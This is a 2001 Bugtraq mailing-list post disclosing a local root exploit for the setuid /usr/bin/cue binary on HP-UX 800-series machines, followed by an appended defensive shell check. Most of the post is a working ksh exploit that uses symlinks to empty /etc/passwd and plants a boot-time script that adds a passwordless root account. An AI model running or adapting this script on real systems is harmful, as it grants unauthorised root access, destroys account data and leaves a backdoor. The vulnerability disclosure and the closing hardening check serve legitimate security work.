Bugtraq mailing list archives

HPUX / 800 models / Old-styled exploit for cue


From: e-chang () spacemail com
Date: Fri, 8 Jun 2001 09:49:52 -0600 (MDT)

Hi there,


One of the major problems I see with admins/security nowadays
is that admins don't secure their hosts: they install patches

...which is slightly different.

It reminds me of this (very) old advisory which was issued by
HP in 1997 (!!!) about /usr/bin/cue :

In the "Workarounds/Solution" section, the advice was to:

# chmod 400 /usr/bin/cue
or
# chgrp trusted /usr/bin/cue
# chmod 4750 /usr/bin/cue

...but admins just don't read advisories. They patch...
...and there was no patch for cue. This explains why most
big HPUX servers are still vulnerable.

I don't know the reason why, but I think I've never seen
any exploit for this one.

Let's remember the "Scriptors of Doom" days!
Local root exploit below.


Emilie Chang.
----------

#!/usr/bin/ksh

##
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
##
## This is just a proof of concept. Don't use for malicious
## purpose. If ever you decide to run that script, please
## read the code carefully before!
##
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
## people. Good job sweethearts.
##
## Old-styled exploit, tested on HPUX 10.20, model 899
## Warning: /usr/bin/cue exists on HPUX 800 models only
##
## Let's test the model by the way...
##

MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
export MODEL

if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
then
     echo "Your host doesn't look like a HPUX 8** model, stopping now."
     exit
fi

##
## Test whether /usr/bin/cue exists or not...
##

if [ ! -u /usr/bin/cue ]
then
     echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
     exit
fi

##
## Well you passed the above tests. Going on playing.
## Creating a file within /etc/rc.config.d : It will
## be executed at next reboot (which might happen
## soon)
##

TTY=`tty | awk -F '/' '{print $3}'`
export TTY

TERM=whatevah
export TERM

umask 000
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null

##
## Inserting evil root account within /etc/passwd
##

echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit

##
## Now saving the passwd file, which we are about to empty
## 

cp /etc/passwd /tmp/passwd

##
## passwd file destruction
## (SOMEONE SET US UP THE BOMB !!)
##

rm IDMERROR.$TTY
ln -s /etc/passwd IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null

##
## *POOF*, now that the /etc/passwd file is emptied, admin
## MUST reboot to get things done.
##

echo "Your nroot account will be created within /etc/passwd"
echo "with no password. Remove it asap, it's just a proof"
echo "of concept!"

# The end.
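Added check, not part of Emilie's post or of HP's advisory: a small sh function that reports whether a setuid binary still carries the permission profile the 1997 workaround was meant to remove (setuid and executable by everyone), so an admin can verify the chmod 400 / chgrp trusted + chmod 4750 advice actually took. The function name and result labels are my own; it only relies on `ls -ld` and `cut`.

```shell
#!/bin/sh
# Added example (not from the original post): classify a setuid binary by the
# permission profile HP's 1997 cue workaround addressed. Only ls and cut are
# used so it runs in a plain Bourne/Korn shell. Labels are my own choice.
#
# Result: absent | not-setuid | hardened | vulnerable
cue_exposure() {
  path="$1"
  if [ ! -e "$path" ]; then
    echo "absent"                            # e.g. not an HP-UX 800-series host
    return 0
  fi
  mode=$(ls -ld "$path" | cut -c1-10)        # e.g. -rwsr-xr-x
  suid=$(printf '%s\n' "$mode" | cut -c4)    # 's' or 'S' when the setuid bit is set
  oexec=$(printf '%s\n' "$mode" | cut -c10)  # 'x' or 't' when world-executable
  case "$suid" in
    s|S) ;;                                  # setuid: keep checking who may run it
    *)   echo "not-setuid"; return 0 ;;      # chmod 400 style workaround, or never setuid
  esac
  case "$oexec" in
    x|t) echo "vulnerable" ;;                # setuid and runnable by anyone: still exposed
    *)   echo "hardened" ;;                  # setuid but restricted, e.g. 4750 with group trusted
  esac
}

# Stand-alone use: report on the binary the advisory covers.
echo "/usr/bin/cue: $(cue_exposure /usr/bin/cue)"
```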